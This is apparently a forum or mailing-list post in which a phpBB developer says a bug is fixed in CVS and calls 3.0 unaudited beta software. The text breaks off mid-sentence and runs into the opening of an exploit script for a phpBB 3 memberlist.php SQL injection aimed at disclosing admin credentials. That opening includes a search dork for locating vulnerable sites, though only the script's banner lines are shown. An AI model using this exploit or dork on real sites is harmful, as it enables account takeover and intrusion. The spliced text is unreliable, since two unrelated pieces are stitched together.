This issue has been fixed in CVS. I will also remind everyone that 3.0 is beta
software and has not yet had a security audit, and therefore we do not
recommend to use the beta in a live environment.
I would also like to remind people that in future we would appreciate it if
such reports could
#!/usr/bin/php -q -d short_open_tag=on
?
echo PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials
disclosure\n;
echo by rgod [EMAIL PROTECTED];
echo site: http://retrogod.altervista.org\n;;
echo dork, version specific: \Powered by phpBB * 2002, 2006 phpBB
Group\\n\n;
/*